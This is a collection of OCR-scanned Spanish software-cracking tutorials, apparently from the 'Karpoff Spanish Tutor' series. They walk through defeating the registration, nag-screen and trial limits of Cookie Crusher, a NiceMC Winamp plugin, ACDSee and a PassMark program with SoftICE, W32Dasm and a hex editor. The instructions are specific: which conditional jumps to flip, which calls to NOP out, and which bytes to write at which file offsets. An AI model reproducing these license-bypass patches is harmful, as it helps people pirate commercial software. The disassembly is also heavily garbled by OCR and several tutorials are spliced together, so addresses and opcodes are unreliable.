seguimos el mismo prodecimiento que con el programa anterior y desgraciadamente vemos que no funciona. el bmsg 
0c64 wm_gettext al primer edit no salta. que curioso, ponemos varios bpx de los habituales y el único que salta es 
getwindowtexta, pero no conseguimos nada. un poco de intuición y suerte es lo que hace falta, así que vamos a ver si 
suena la flauta. tecleamos un bpx hmemepy ... y softice salta de nuevo maravillosamente. 


ahora podriamos utilizar el comando page con el valor que muestra es:edi (después del repz movsd) y luego un bpr de rw 
al selector 30 para salir disparados al código real del programa pero prefiero, en beneficio de la sencillez, darle caña al 
f12 hasta salir a cookie!.text +0001d013, de ahí con £10 vamos a pasar por unos cuantos ref hasta aterrizar aquí: 


:00410£3d e8aa7b0300 call 00448aec 
:00410f42 33f6 xor esi, esi ->aterrizamos aquí. 
:00410f44 8bc3 mov eax, ebx ->nuestro nombre en eax (ojo, ¿falta el último caracter?). 


:00410f48 eb0a ¡mp 00410154 ->saltando... 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00410f48(u) 


:00410f54 8b4da0 mov ecx, dword ptr [ebp-60] -> aquí. 

:00410f57 8b81c4020000 mov eax, dword ptr [ecx+000002c4] 

:00410f5d eS667b0300 call 00448ac8 -> manipula el nombre. 

:00410f62 3bf0 cmp esi, eax -> eax = 8 caracteres. 

:00410f64 7ce4 jl 00410f4a -> bucle atras hasta que esi = eax = 8. 

:00410f66 69d7c1dc0100 imul edx, edi, 0001dcc1-> ¡lo que son las matemáticas!. 
:00410f6c 89d7 mov edi, edx -> el número que buscamos en edi. 

:00410f6e 83ff01 cmp edi, 00000001 

:00410171 7d05 ¡ge 00410f78 -> salto... 


oli sos más código 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00410fa0(u) 


:00410fa7 8d45f8 lea eax, dword ptr [ebp-08] 

:00410faa e801 150800 call 004924b0 

:00410faf ff45c0 inc [ebp-40] 

:00410fb2 8$b00 mov eax, dword ptr [eax] -> nuestro número de prueba en eax. 
:004101b4 eS33a40600 call 0047b3ec -> manipula el número y cuando retorna... 
:00410fb9 Sbd8 mov ebx, eax -> eax = ebx = 499602d2. 
a más código 

004 10fe1 8bcf mov ecx, edi 

:00410fe3 8bc1 mov eax, ecx 

:00410fe5 99 cdq 

:00410fe6 33c2 xor eax, edx 

:00410fe8 2bc2 sub eax, edx 

:00410fea 3bd8 cmp ebx, eax -> comparación entre el serial bueno y el malo. 
:00410fec 0f85eb010000 jne 004111dd -> como no son iguales, nos manda fuera... 
:00410ff2 66c745b42c00 mov [ebp-4c], 002c 


solo queda hacer un ?eax para ver de nuevo que 499602d2 hexadecimal es 1234567890 en decimal y con un ?ebx 
obtenemos el número de serie correcto. con este número nos registramos adecuadamente como puedes comprobar: 


About Cookie Crusher... 


(y. Cookie Crusher v2.6 
AY Copyright * 1997-2000 The Limit Software, Inc, All Rights Reserved. 


¡This product is licensed to: 


_ ARANIAN Update Check 
Serial Number. ; JE, JE, JE 1 


' ¡ Web Site | 
This product is ficensed for use on only one computer 
y Mera | 


unless otherwise specified above, 


apunte final 


¿como crackear estas "protecciones"?, puedes probar a invertir el salto después de la comparación, verás que funciona 
sin ningún problema. mejor todavía es cambiar el código de las comparaciones de manera que el serial se compare 
consigo mismo. 


otra cosa que nunca falla es comprar el programa, si te gusta, y ser un usuario debidamente autorizado. 
si esperabas encontar algún serial number correcto, siento decepcionarte, ya sabes, quien quiera peces... 
de todas formas, alguna vez tendrás que aprender a pescar..., ¿no? 
¡je,je je ! 
"if you give a man a crack 
he'll be hungry again tomorrow, 
but if you teach him how to crack, 


he"ll never be hungry again." 


+orc 


dedicado a toda esa gente que está hambrienta de conocimiento. 


Karpoff Spanish Tutor 


Programa: [NiceMC Media Plugin v1.7 | Media NiceMC Media Plugin v1.7... vl1.?” 


Serial, y una nag, muy molestosa, y tan grande que no me deja 
ver mis videos de música favoritos ademas si lo mueves a un 
extremo aparece otro igual, y siguen Jeringando, al 4 tema deja 
de responder ya no reproduce nada. 


PROTECCION: 


Este plugin no solo hace que reproduzcamos solo música sino 
también videos desde .mpg hasta archivos *.dat,*.vob que son los 
archivos para DVD y como dije muchos otros más. 


También pueden verse imágenes en forma de diapositivas. 


Dificultad: Principiante 


DOWNLOAD : http: //www.nicemcmedia.com 


SoftICE cualquier versión yo utilizo la ver. 3.25 
W32Dasm Ver 8.93 (Opcional) 
Hworks32 editor hexadecimal (Opcional) 


Herramientas: 


INTRODUCCION 


Bueno después de leerme todos los tutoriales que me baje de la pagina de KARPOFF , 
Cracker al que no tengo el gusto de conocer, y a sus muchos amigos que tiene por ahí; 
también Crackers especializados; a quienes agradezco por los conocimientos que me 
transmitieron, y que ahora también yo aporto con este granito de arena. 


Espero que les sirva. 


AL ATAKE 


ahora es el momento de iniciar el plugin, ejecuten winamp, y les aparecerá una nag, con 6 
botones, el 1% para la registración (enter registration code), y el quinto para continuar 
sin registrarse (i agree). y una nota que nos dice que este mensaje desaparecerá cuando nos 
registremos. 


esta bien, presionemos el botón de registro (enter registration code), aparece una ventana 
con el nombre de "registration info", coloquen cualquier dato a name y key code y presionen 
el botón "ok". 


en mi caso coloque: 


name: fancy <- anota esto en un papel tal como esta, pero lo que tu coloques 


key code: 123456789 


vemos que al presionar aparece un mensaje que dice "wrong code" con el botón aceptar. si 
presionamos aceptar desaparece la ventana de mensaje. 


conclusiones: 


la ventana parece del tipo <messageboxa>, así que podemos ir softice a comprobarlo, pero 
podemos intentar con el w32dasm buscado el mensaje que nos mostró al introducir el registro 


falso. veamos... vamos, antes cierren winamp talvez les aparezca un mensaje de error, en mi 
maquina aparece!..., pero después que lo crackee ya nunca más volvió a salir. no se 
preocupen. 


ya esta cargado nuestro w32dasm con winamp, ya saben verdad: 


1% click disassembler 


2% clic open file to disassembler 


3% cargar el archivo in_nicemc.dll 


4% esperar, todo depende de la velocidad de su pc. 


5% guardar el archivo como proyecto, lo utilizaremos más tarde, y asi después de reiniciar, 
se Cargara este archivo más rápido casi instantáneamente, esto para evitar esperando, y 
sobre todo para abrir rápidamente cualquier otro archivo. esto se hace de la siguiente 
manera: 


clic disassembler 


clic save disassembler text file and create project file. 


escoger el directorio donde guardarlo, y clic en "aceptar", el nombre se dara por defecto 
alt. 


6% buscar el mensaje que vimos en la ventana. "wrong code", en string data references o con 
find text, pero ya saben primero lo primero. 


7% me hierve la cabeza, por no haberlo encontrado. 


8% no nos queda otra que utilizar el súper softice, también pueden utilizar trw2000, muy 
parecido al softice pero no necesitamos reiniciar a fancy (así se llama mi maquina "mundo de 
fantasías") o su pc. 


la razón de no haberlo encontrado es porque, es que los plugins son archivos *.dll que 
winamp carga en su carpeta de plugins. 


además también busque en este archivo in_nicemc.dll, y no encontre nada, es por eso que 


vamos al softice, el nos dara una pista. para que noten no todo esta en los archivos *.exe, 
como algunos ven en los tutoriales que han leído. 


pasos: 
1% reiniciar a (fancy), su pc para cargar softice. 


2% antes de hacer cualquier cosa, talvez no veas el archivo in_nicemc.dll en tu pc. para 
debes de ir a en cualquier ventana de windows o hacer doble clic a mi pc del menu de 
herramientas clic en "ver", "opciones de carpeta" -> planilla "ver" clic "mostrar todos los 
archivos" y aceptar. 


3% carga el archivo in_nicemc.dll en el w32dasm y espera, o bien abre tu proyecto 
in_nicemc.alf si lo guardaste como proyecto y listo ahí esta. 


4% abrir el loader32 (softice) y cargar winamp. 
5% clic en load el icono de las tuercas y clic en si. 
6% clic "f5", vez que se cargo winamp. 


7% haz clic en play te aparecera el nag, entra a "enter registration code", e introduce 
datos en "name" y "key code" y no presiones todavía "ok" 


8% realiza un control+d para volver al softice y coloca un bpx messageboxa y enter luego 
"eb" la 


9% ahora si puedes presionar "ok", vamos sin miedo. 
10% saltamos al softice, ahora debes estar viendo 
user32! messageboxa 

XXXX:XXXXXXXX 55 push ebp 


11% presiona "f12" y volveras a windows y te mostrara el mensaje de error haz clic en 
aceptar y volveras al softice, en realidad al lugar de donde se llamo al mensaje de error: 


* reference to: user32.messageboxa, ord:01c3h 


¿XXXxX75af ff1570484610 call dword ptr [10464870] <- este llama al mensaje de error "bueno en 
softice aparecera" como sigue 


025f£:029c75c7 ff157048e202 call [user32!messageboxa] 


si buscas estas direcciones en el archivo de winamp desemsamblado no lo encontraras, como te 
dije este se encuentra en el archivo *.dl1l el plugin. 


¿XXXxX75b5 eb16 jmp 100075cd 
* referenced by a (u)nconditional or (c)onditional jump at address: 


| :xxxx759d (c) 


:Xxxx75b7 6a00 push 00000000 


para que te ubiques mejor ve al w32dasm 


y en goto code location escribe 100075af 


:1000757b 830404 add esp, 00000004 

:1000757e a314d30210 mov dword ptr [1002d314], eax 
:10007583 al14ad30210 mov eax, dword ptr [1002d314] 
:10007588 50 push eax 

:10007589 68c0350e10 push 100e35c0 


:1000758e e8e79dffff call 1000137a <- este llama a la rutina de comprobación del serial, 
debes entrar a este para estudiarlo, pero como lo estudie, te lo explicare. 


:10007593 83Cc408 add esp, 00000008 


:10007596 833d18d3021000 cmp dword ptr [1002d318], 00000000 <-— este compara la comprobación 
del registro si es valido o no 


:1000759d 7418 je 100075b7 

:1000759f 6a00 push 00000000 

:100075a1 685c940210 push 1002945c 

:100075a6 68e8930210 push 10029388 

:100075ab 8b4d08 mov ecx, dword ptr [ebp+08] 
:100075ae 51 push ecx 


* reference to: user32.messageboxa, ord:01c3h 


:100075af ff1570484610 call dword ptr [10464870] 
:100075b5 eb16 jmp 100075cd 


explicación 


:1000758e e8e79dffff call 1000137a <- aquí debes entrar presiona el boton "call" si estas 
con softice presiona "f8" 


* referenced by a Call at addresses: 


|:10006582 , :1000758e , :10007£06 


:1000137a e9%el0a0000 jmp 10001e60 <-—aquí apareces ahora presiona "jump to", si estas en 
softice "f10 o f8" 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :1000137a (u) 


:10001e60 55 push ebp <-aquí apareces 

:10001e61 8bec mov ebp, esp 

:10001e63 83ec48 sub esp, 00000048 

:10001e66 53 push ebx 

:10001e67 56 push esi 

:10001e68 57 push edi 

:10001e69 c745f800016201 mov [ebp-08], 01620100 

:10001e70 c745£fc00000000 mov [ebp-04], 00000000 

:10001e77 eb09 jmp 10001e82 <- colocate aquí y presiona "jump to", si estas en 


softice "f10 o f8" 


* referenced by a (u)nconditional or (c)onditional jump at address: 

| :10001e77 (u) 

:10001e82 8b4d08 mov ecx, dword ptr [ebp+08]<-aquí apreces baja más 
:10001e85 51 push ecx 


* reference to: msvcrt.strlen, ord:02beh 


:10001e86 e851570100 cal1 100175dc <- si estas en softice presiona "f10", para no entrar a 
la llamada 

:10001e8b 830404 add esp, 00000004 

:10001e8e 3945fc cmp dword ptr [ebp-04], eax 
:10001e91 7341 jnb 10001ed4 

:10001e93 8b5508 mov edx, dword ptr [ebp+08] 
:10001e96 0355fc add edx, dword ptr [ebp-04] 
:10001e99 0Ofbe02 mMOVSX €eax, byte ptr [edx] 
:10001e9%c 83e801 sub eax, 00000001 

:10001e9f 8b4d08 mOvV ecx, dword ptr [ebp+08] 
:10001lea2 034dfc add ecx, dword ptr [ebp-04] 
:10001lea5 Ofbe11 movsx edx, byte ptr [ecx] 
:10001lea8 83c202 add edx, 00000002 

:1000leab Ofafc2 imul eax, edx 

:10001leae 8b4d08 MOV ecx, dword ptr [ebp+08] 
:10001eb1 034dfc add ecx, dword ptr [ebp-04] 
:10001eb4 Ofbe11 movsx edx, byte ptr [ecx] 
:10001leb7 83c205 add edx, 00000005 

:1000leba Ofafc2 imul eax, edx 

:1000lebd 6bc009 imul eax, 00000009 

:10001ec0 8b4df8 MOV ecx, dword ptr [ebp-08] 
:10001ec3 8d5401f2 lea edx, dword ptr [ecx+eax-0e] 
:10001ec7 8955£8 mov dword ptr [ebp-08], edx 
:10001leca 837dfc0c cmp dword ptr [ebp-04], 0000000c 
:10001lece 7502 jne 10001ed2 

:10001ed0 eb02 jmp 10001ed4 <- colocate aqui y presiona "jump to", si estas en 


softice "f10 o f8" 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 

| :10001e91 (c), :10001ed0 (u) 

:10001ed4 8b45f8 mov eaxX, dword ptr [ebp-08] <- aqui apareces baja 

mucho ojo aqui, como oi por ahi, pon ojos de buho, super abiertos 

:10001led7 3b450c cmp eax, dword ptr [ebp+0c] <- si estas con softice, coloca esto en la 
ventana de comandos: 


? eax y enter, anota el numero en decimal que aparece, borra todos los bpx (bc*) y "f5", 
coloca el mismo nombre que colocaste anteriormente y el numero de registro que anotaste. 


:10001leda 750a jne 10001ee6 <- aquí puedes modificar con el editor hexadecimal, su offset es 
leda cambiar 75 por 74 (je 10001ee6), solo para practicar y te dara buenos resultados, es 
decir no saltara. 


:10001ledce c7051843021001000000 mov dword ptr [1002d318], 00000001 <-— aquí saltara si 
modificas con el editor y tomara tu serie como válido. 


listo eso es todo, si seguiste bien con softice, o w32dasm podras notar que no es tan 
complicado hacer un keygen haber si lo logras, te ayudara mucho para aprender el lenguaje 
ensamblador, yo lo haré pero me llevara un poco de tiempo, mientras disfruta de este plugin, 
como yo en este momento. 
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Serial, y una nag, molestosa aparece Cada cierto numero de 
PROTECCION: O a ; 

imágenes mostradas, recordándonos que debemos registrarnos. 

. . Programa para ver imágenes, *.bmp, *.Jjpg, *.gif, etc, se los 

Descripcion: ! = 

recomiendo muy bueno, en español 
Dificultad: Principiante 
DOWNLOAD : http://www. acdsystems . com/es/products/acdsee 


SoftICE cualquier versión yo utilizo la ver. 3.25 


W32Dasm Ver 8.93 (Opcional) 
Hworks32 editor hexadecimal (Opcional) 


Herramientas: 


introduccion 


después de varios estudios, a los cracks, tuve una idea, como dijeron que existen 
muchas maneras de crackear, me puse a ver este programa y a ver si podía hacerlo de 
manera diferente al ya explicado y lo logre, es una manera de practicar, vamos 
inténtalo. 


como siempre se ha dicho, primero estudiemos el comportamiento del programa, 
notamos que en la ventana aparece un mensaje de [no registrado], vamos al menu 
"ayuda" y clic "en acerca de acdsee 32", vemos una nag, la misma que molesta 
cada vez que vemos una cantidad de imágenes con el, ahora haz clic, en 
"registrese hoy", y aparece la ventana de registro llena datos y "ok", aparece 
un mensaje, este mensaje es un [messageboxa], puedes usarlo con el softice, una 
manera, de no estar adivinando, es usando apis 32, una utilidad que te muestra 
cual fue la ultima llamada de apis de windows que se hizo, y que función, en 
este Caso me devolvió [messageboxa], y esta en la dirección xxxx:4095f3. 


coloca este mensaje como control+d, bpx messageboxa en softice, antes de 
presionar "ok", después salte del softice, y ahora si "ok", estamos en softice 
presiona "f12", para saber que parte del codigo envio este mensaje: 


025£:0044a4fd call [user32! messageboxa] <- este llamo al mensaje de error 


XXXX:XXXXXXXX pop edi fl aquí apareces después de presionar "f12" 
XXXX : XXXXXXXX add esp,00000100 


bueno para, ubicarnos mejor vamos al w32dasm y cargamos el programa vamos a esa 
dirección, recorremos arriba en el codigo, en realidad es adelante, y buscamos 
alguna pauta, como un "je" un salto condicional, pero no encontramos nada, 
vamos de nuevo al softice, ten en cuenta que aun debe estar "bpx messageboxa", 
hacemos lo mismo presionando "ok", en la ventana de registro, y saltamos de 
nuevo, al codigo de arriba, presionamos de nuevo "f12", y saltamos al codigo 
que hizo esa llamada: 


:004591b1 eSeal2ffff call 0044a4a0 fl este hizo la llamada para el error 
:004591b6 83c414 add esp, 00000014 fl apareces aqui 

subimos un poco con el softice, y vemos una comparación y salto sospechosos aquí: 
:00459121 eSfaefffff call 00458120 fl este verifica el serial 

:00459126 83f£801 cmp eax, 00000001 fl compara si serial es verdadero 
:00459129 7543 jne 0045916e fl si no lo es salta 

:0045912b alb4045000 mov eax, dword ptr [005004b4] 

:00459130 8b3d18045000 mov edi, dword ptr [00500418] 


ahora debemos profundizar esto, es decir entremos a la llamada para ver donde, pone eax en 
1, tambien podíamos cambiar el jne por je, pero en realidad saltamos al mensaje de si 
registrado cuando en realidad no lo estamos asi que esto no sirve, es por eso que debemos 
profundizar el call 00458120. antes debes hacer bc 0 para borrar el messageboxa, ya no nos 
sirve. 


después de ingresar a esa call ya saben con "f8", presionen "f10" para trazar el codigo, 
hasta aquí: 


:0045816e 51 push ecx 

:0045816£ 53 push ebx 

:00458170 56 push esi 

:00458171 50 push eax 

:00458172 e8391c0000 call 00459db0 fl este call pone a eax=0 
:00458177 83c410 add esp, 00000010 
:0045817a 85c0 test eax, eax 

:0045817c 740£ je 0045818d fl este salta 
:0045817e 5f pop edi 

:0045817f 5e pop esi 

:00458180 5d pop ebp 

:00458181 b801000000 mov eax, 00000001 
:00458186 5b pop ebx 

:00458187 830424 add esp, 00000024 
:0045818a c20c00 ret 000c 


bueno ahora ponemos un bpx en 458172 para ver que hace, luego cierra el programa, vuelve a 
ejecutar el programa, notaras que siempre que cierras y ejecutes el programa, siempre 
llamara a esta instrucción: 


:00458172 e8391c0000 call 00459db0 fl este call pone a eax=0 


mi logica es que este es el que comprueba en serial siempre, asi que vamos a nopear, es 
decir vamos al editor hexadecimal, al offset 58172 


y Cambiamos e8 39 1c 00 00 por 90 90 90 90 90, y listo estamos registrados. 


para todos aquellos que quieran, dar ideas, consultar, o trabajar en grupos ayudándonos, 
aquí pueden encontrarme: 


mi correo: 


dyfredtlettera.net bueno pero este cambiara más adelante 


mi número de icgq (yo utilizo el icgq2000a) 


79406190 aquí seguro me encuentran los sabados desde 11:00pm a 12:00, estoy muy limitado de 


navegar. :( 


bueno tengo otros tres cracks tambien ya realizados pero me falta tiempo para, 
transcribirlos de seguro la proxima semana estaran ya listos para ustedes, pasare a 
describir a los programas que he modificado: 


windowsfx: programa 
más, pero tiene más 


http: //www.stardock. 


para hacer hecer que tus menues sean transparentes, en esto se destaca 
utilidades. 


com/products/windowfx/download.html 


winrar: el programa 


y el otro que no me 
crackme. 


karpoff spanish tutor: 


que tiene de evaluación 40 días. para windows 98 ya lo conocen. 


acuerdo porque lo hicimos en Casa de un amigo, es lo ustedes llaman 


pagina dedicada a la divulgacion de informacion en castellano, sobre 
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Karpoff Spanish Tutor 


INTRODUCCION 


Muy buenas una vez más, otra vez estoy aquí, pero esta vez como miembro del grupo [K-FoR], así que os invito a 
que paséis por nuestra página, http: //pagina.de/kfor, no os defraudará. 


A parte de las herramientas arriba mencionadas, para el último retoque voy a utilizar el Exescope. Aunque esta 
última parte no es obligatoria, no viene mal pasar un buen rato ;-) 


preliminares. obtener información 


lo primero como siempre es saber de que va el tema. ejecutamos el programa, y nos recibe una ventanita de registro, donde 
si no ponemos nada, podemos continuar, y si metemos unos datos al azar, aparece una ventana diciéndonos que nos hemos 
equivocado. 


vamos a la ayuda, y allí nos dicen que el programa dura 30 días, pero además, sólo tenemos 15 minutos en cada ejecución. 


bueno ya sabemos que tenemos que intentar hacer, ahora nos queda saber si el ejecutable está empaquetado o encriptado, 
a parte del compilador. utilizamos la herramienta que queramos, ya sea gettyp, file analizer, file inspector, etc..., y nos dice 
que no está encriptado, ni empaquetado, y que el compilador es visual c++ 5.0. por ahora ningún problema. 


tened preparado softice, porque vamos a empezar con él. ( y continuaremos y acabaremos con él) 


la nag inicial 


este tipo de ventanitas al inicio son muy comunes, si quieres puedes continuar, sin meter el código. además suele pasar que 
al eliminar la ventana, eliminas la protección, porque ésta se suele basar en que ya no te deja dar a continue. el método que 
yo suelo utilizar se reduce a lo siguiente: encontrar el call donde se llama a la ventana, hacer que pase por él cómo si 
hubiesemos pulsado el botón de continuar. 


vamos a por ella, iniciamos el programa y nos sale la ventanita. esta vez he decidido entrar en ella con los window 
messages, concretamente con wm_destroy. es decir cuando destruyamos la ventana softice saltará. pero primero hay que 
saber que ventana es, vamos a softice (ctrl+d), y si no sabemos el nombre del ejecutable introducimos el comando task, y 
nos aparecerán todos los programas que están funcionando en nuestro ordenador. hay está, bit, éste es. ahora tenemos que 
saber cuál es el handle ('manejador') de nuestra ventana, para ello está el comando hwnd + tarea, donde tarea es el 
nombre de nuestro ejecutable, en este caso, hwnd bit, y nos aparece un listado con las ventanas que tiene en este 
momento nuestro programa, con sus respectivos botones, la que aparece en primer termino suele ser la que estamos 
buscando. en este caso a mi me sale esto: handle: 4c0(1) , fijaos que bajo class-name aparece ++32770 (dialog), y a 
continuación se ramifican los botones y otras cosillas. como observación, si nos interesase que saltase al pulsar un botón, en 
lugar de wm_destroy, utilizaríamos wm_ command, sería exactamente igual, salvo que el handle continuaría siendo el de la 
ventana a la que pertenece el botón, no el del propio botón. es decir, que en este caso sería 4c0. 


una vez tenemos el handle, que será distinto en vuestros ordenadores (incluso de una vez para otra), tenemos que poner el 
breakpoint correspondiente, un kbmsg + handle + windowmessage, en este caso sería, bhmsg 4c0 wm_destroy. ya 
está, salimos de softice y pulsamos a continuar y .... 


...Salta softice, vamos pulsando f12 hasta que aparezca en la línea verde bit, y aparecemos en: 
* reference to: user32.dialogboxparama, ord:0093h 


:00408995 ff1580124100 call dword ptr [00411280] 
:0040899b 56 push esi  <- aquí es donde aparecemos. 
:0040899c 8bf8 mov edi, eax 

:0040899e e868ba0000 call 0041440b 

:004089a3 830404 add esp, 00000004 

:00408946 85ff test edi, edi 

:004089a8 751c jne 004089c6 


podríamos seguir con f10 hasta encontrar un ret, para ver de donde venimos, pero en este caso es más cómodo pulsar una 
vez más f12, por momentos parece que no va a volver a softice, pero de pronto vuelve a romper y ahora aparecemos aquí: 


* referenced by a call at address: 
1:0040148c 


* possible stringdata ref from data obj ->"2" 


:00408560 c70508fc4200084f4200 mov dword ptr [0042fc08], 00424f08 

:0040856a c70504fc420000000000 mov dword ptr [0042fc04], 00000000 

:00408574 e897000000 call 00408610 

:00408579 83f801 cmp eax, 00000001 <- aquí aparecemos esta vez. realmente interesante ¿no? 
:0040857c 7501 ¡ne 0040857f <- aún más interesante que antes, jeje. 

:0040857e c3 ret 


bueno aquí ya vemos algo interesante, vemos una comparación de eax con 1, y si no es igual salta, interesante. antes de 
nada, para asegurarnos que este es el call, ponemos un breakpoint sobre él, bpx 408574. ahora vamos hasta el salto, y 
vemos que efectivamente no va a saltar, ya que eax=1 (sino os aparece el valor del registro eax, o el del resto de registros 
pulsad f2 y aparecerán todos). pero como somos muy curiosos, vamos a cambiar el salto, vamos a hacer que salte, con el 
comando r fl z, que cambia la flag cero. una vez cambiado, pulsamos f5, y vemos como nuestro programa se cierra, es decir 
que si eax es distinto de uno vamos a la mierda. 


volvemos a ejecutar el programa, y nos salta nuevamente softice, si queremos ver si ya a saltado la ventana, podemos pulsar 
f4, que nos permite ver que pasa por windows, vemos que no ha aparecido la ventana, es decir esta es nuestra llamada. si 
miramos los valores del registro, podemos ver que eax ya vale 1, esto nos da ganas de nopear el call, pero quién sabe si en 
algún momento, eax no vendrá aquí con valor 1, así que para asegurarnos, lo que vamos a hacer es meternos en el call, 
poner eax a cero, luego añadirle uno, y finalmente salir del call nuevamente. si nopeásemos el call, podríamos ver que todo 
va perfectamente, pero a mi no me va mucho. 


vamos a hacer lo que dije antes, vamos a meter todas las instrucciones en el call. hay dos opciones: 


(a) podemos escribir sobre el propio código en 408610, pero primero tenemos que saber su offset, para ello podemos 
utilizar el wdasm, el krackpe, o el propio file inspector de viper. el caso es que el offset es 8610. ahora hay que tener claro 
que instrucciones vamos a poner y cómo ponerlas: 


instrucción en bytes 

Xor eax, eax 31c0 <-- eax=0) 
add eax, 01 83c001  <-- eax=1 
ret c3 <-- salimos del call 


dicho esto, vamos al editor hexa e introducimos los nuevos bytes en 8610. y ya no nos volverá a aparecer la dichosa nag, y 
además ya hemos eliminado el límite de 30 días, probab a adelantar la fecha a un par de meses, jeje. 


(b) escribir en una zona vacía de nuestro ejecutable. esto es lo que a mí me gusta más, pero a parte de las instrucciones 
anteriores necesitamos tener el nuevo call de llamada. en 421150 hay bastante espacio vacío, su offset es 21150. aquí será 
dode metamos las instrucciones anteriores. pero en 408574 (offset 8574) hay que cambiar call 00408610 por call 
421150. este último se escribe así: e8d78b0100. (en otros tutoriales he explicado cómo se puede sacar esto) 


por tanto lo que ha que hacer con el editor hexa es ir a es 8574, y poner e8d78b0100, y en 21150 poner 31c083c001c3. y se 
acabó. 


limitación de 15 minutos 


podemos hacerlo de dos formas, una es pulsar el botoncito de ok y esperar 15 minutos haber que pasa, y otra es buscar en 
el wdasm algo que nos pueda ayudar. ya sea por ejemplo buscar, O000000f (15 hexa), d2f0 (15*60*60 en hexa), etc... O 
alguna frase que nos pudiese ayudar. si vamos a configuration y de ahí a test preferences, podremos ver que hay un 
apartado en el que le podemos decir el tiempo que queremos que esté funcionando, por defecto aparece el 15. si metemos 
por ejemplo16, y le damos a ok nos aparece esta ventanita: 


Sorry - See the Online help for registration details 


O 


OR 


bueno, ya tenemos nuestra frasecita. si la buscamos en el wdasm, aparecemos aquí: 


:004069f9 89442454 mov dword ptr [esp+54], eax 

:004069fd 742f je 0O406a2e <--- si saltásemos aquí evitaríamos problemas ;-) 
:004069ff 83£801 cmp eax, 00000001 

:00406402 7c05 jl 00406409 

:00406a04 83f80f cmp eax, OO00000f <- ¡¡¡ qué tenemos aquí !!! 
:00406407 7e38 jle 00406241 


* referenced by a (u)nconditional or (c)onditional jump at address: 


|:00406a02(c) 


| 
:00406409 8b1578784200 mov edx, dword ptr [00427878] 


:00406a0f 6240 push 00000040 


* possible stringdata ref from data obj ->''sorry - see the online help for " 
->"registration details" 
| 


:00406a11 6858464200 push 00424658 


* possible stringdata ref from data obj ->'the shareware auto stop period " 
->'"must be between 1 and 15 min." 
| 


:00406a16 6814454200 push 004245f4 


vaya, parece una zona más que interesante, ahí tenemos el 15 (0000000f) que dije anteriormente. sólo tenemos que cambiar 
el 74 por eb en 4069fd, es decir, cambiar je por jmp. supongo que eso ya lo sabréis hacer, así que lo dejo en vuestras 
manos. 


retoques finales 


aunque el grueso del trabajo ya está realizado, aún quedan cosas por ahí que nos indican que no estamos registrados. como 
son: 


- NOS aparece evaluation version. (1) 

- en el menú about nos ponen lo de los días y también nos pone serial +* - >evaluation. (2) 

a parte de esto, hay otras cosas que quizás en la versión registrada no desaparezcan, pero que podemos eliminar: 
- en el menú help, nos aparece register software. (3) 

- y en la barra de tareas, nos aparece el icono de la llave para registrarnos. (4) 


para (1) y (2) es exactamente igual, vamos a wdasm, buscamos las frases correspondientes, evitamos los saltos u obligamos 
a hacerlos, según corresponda en cada caso, esto creo que lo sabréis hacer así que os lo dejo a vosotros. 


sin embargo si buscamos (3), veremos que no podemos evitar que lo escriba, así que no seería necesario eliminarlo. 


como ya he dicho esto no es obligatorio, pero vamos a pasar un buen rato y el que no conozca exescope se sorprenderá. 
vamos allá: 


abrimos nuestro ejecutable en exescope, nos aparecen tres opciones: header, import y resource. a nosotros nos interesa 
resource. 


nos metemos en resource, vamos a menu, y pinchamos sobre lo que aparece. ahora en la ventana de la derecha nos han 
aparecido todas las opciones del menú del programa, únicamente debemos ir a register software, pulsar con el derecho sobre 
él y dar a delete. fuera register. 


para el (4), lo único que he visto es lo siguiente, si alguien encuentra otra cosilla que me lo diga: vamos a resource, ahora a 


bitmap, damos a 117 y aparece lo siguiente: 
y 1112 


hay está nuestra llave, exportamos la imagen y la modificamos. podemos borrar la llave o poner otra imagen encima, y luego 
la importamos de nuevo, como por ejemplo: 


Y, 
AN 


2 OO. 101112 


y tendríamos nuestro botón particular. si queremos que vaya a otra página que no sea la de comprar el programa, sólo tenéis 
que buscar en el editor hexa http: //www.passmark.conysales (como ansi string), y poner lo que queráis, yo he puesto 


conclusiones 
deshabilitar botones y muchas otras cosas. 


esto último no sirve para mucho, pero quería que viéseis la capacidad de exescope, de como nos puede ayudar a habilitar o 


con la diversión que esto supone por supuesto ;-)) 


bueno se acabó, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna pregunta no dudéis en 
decirmelo. espero que os haya resultado útil este tute. no olvidéis que nuestro objetivo sólo es aprender. sin contar 


me gustaría aprovechar la ocasión para agradecer a todos los que me han ayudado a meterme en este apasionante mundillo, 
todos los miembros de [k-for]. 


que han sido muchos, a todos ellos los mando un gran saludo y les doy las gracias. en especial un gran saludo a karpoff y a 
hasta la próxima... 


«oo z=ézeona » 


mi correo: kuato_thortdhotmail. com 


la página de [k-for]: http: //pagina.de/kfor 
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Karpoff Spanish Tutor 


Dificultad: Muy Fácil. 


introduccion 


hola a todos! en primer lugar me presentaré soy john keeper un newbie bastante torpe pero que con un poco 
de ayuda de los grandes (mOniac_pc,profesor_x,karpoff argenbyte,y muchos +)ha conseguido dar sus 
primeros pasos en esto del cracking. aprovecho para dedicar este tutorial a whistler (diseñador gráfico de la 
ostia,creedme), x-faktor (compañero de aventuras), y a mis amigas luzma, patry, laura y mariceli (ctd), así 
como también a whickerman y a kevenant. bueno a lo q interesa, el programa al q nos enfrentamos es un 
¡juego de billar con unos gráficos un poco pobres, aunq ya se sabe q para pasar el rato cualquier cosa sirve ;p. 
tiene un sistema de protección muy simple y fácil de comprender, por eso ( y q no sirva de precedente) vamos 
a crackearlo con el w32dasm y luego vamos a buscar el serial con el soft-ice,aunq cuando hayamos crackeado 
el programa con el w32dasm no hará falta el soft-ice para averiguar el serial puesto que los señores q por lo 
visto se han encargado de la seguridad, tenían partida de póker esa noche y dejaron el trabajo a medio 
terminar para irse pronto, y al crackear el programa aparece grabado en el registro de windows el verdadero 
serial,unos fenómenos vaya. aprovecho también para deciros q no soy más q un newbie con pocos 
conocimientos, pero q me he decidido a colaborar con karpoff y ayudar a iniciarse en esto a todo el q quiera, 
de hecho es mi primer tutorial y está escrito en términos muy fáciles (principalmente porq yo no tengo mucho 
nivel en esto), q todos podemos entender, así q señores maestros de cracking perdónenme por los errores 
aberrantes q de seguro cometeré al hacer referencia a algo. y también aprovecho para animáros a q escribáis 
vuestros propios tutoriales, venga q se vea lo q sabéis. 


en primer lugar abrimos el programa y vemos que nos aparece la siguiente nag screen(ventana de aviso o información): 


Order Information 


